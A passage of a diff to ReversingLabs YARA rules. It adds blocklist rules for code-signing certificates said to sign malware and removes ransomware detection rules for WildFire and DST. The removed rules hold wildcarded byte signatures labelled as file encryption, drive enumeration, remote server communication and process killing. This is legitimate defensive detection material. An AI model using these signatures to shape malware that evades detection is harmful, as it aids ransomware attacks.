?? - ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? - ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D - ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 - ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ?? - ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TIM Konstrakshn, TOV" and pe.signatures[i].serial=="66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15058-L15076" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures[i].serial=="e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b") and 1528156800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE { meta: - description = "Yara rule that detects WildFire ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0c44f017-703c-5db7-b777-62fcd181af9a" - date = "2021-08-12" - modified = "2021-08-12" + id = "bc380123-20fc-55de-ad1c-4f13ac173cc9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15078-L15094" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WildFire" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02 - [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ?? - ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? - 8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? - ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? - 2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11 - ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08 - 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? DE ?? 2A - } - $enum_drives = { - 00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A - 0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ?? - 6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11 - ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D - 0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B - } - $file_search = { - A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] - A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ?? - 25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B - 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F - ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ?? - 9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ?? - 13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ?? - 11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ?? - ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F - ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ?? - ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? ?? ?? ?? ?? ?? DE - } - $remote_server_communication_1 = { - 00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ?? - ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ?? - ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2 - 25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10] - A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? - [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 - 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ?? - 11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? - ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? - 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15096-L15112" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE { meta: - description = "Yara rule that detects DST ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bcc9933d-14eb-5f83-a136-5f009c7a3282" - date = "2021-12-06" - modified = "2021-12-06" + id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15114-L15132" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DST" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC - 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? - ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 - 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ?? - 31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB - 0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ?? - ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? - ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00 - E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? - ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 - ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D - } - $encrypt_files_p2 = { - 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 - ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ?? - 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? - BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? - ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? - ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ?? - 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? - ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48 - 8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48 - } - $encrypt_files_p3 = { - C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ?? - ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D - 4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C - 24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 - 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C - 24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 - DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74 - 24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F - 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ?? - ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? - ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 - ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? - ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 - DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC - 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42 - ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48 - } - $encrypt_files_p4 = { - 89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ?? - E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 - 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? - ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? - ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? - ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 - E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? - ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? - ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 - 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? - C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC - 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 - 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? - ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 - ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 - 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? - ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90 - E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? - ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24 - ?? E8 - } - $find_files_p1 = { - 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC - 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? - ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ?? - 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ?? - 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C - 24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 - 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48 - 8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48 - 8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D - 4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1 - 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3 - E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? - 48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC - 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C - } - $find_files_p2 = { - 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ?? - ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B - 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24 - ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ?? - ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA - ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84 - 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48 - 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44 - 24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? - 48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? - 48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48 - 8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84 - 24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? - 48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8 - } - $kill_procs_p1 = { - 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC - 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 - 89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48 - 8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1 - E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8 - FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 - 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 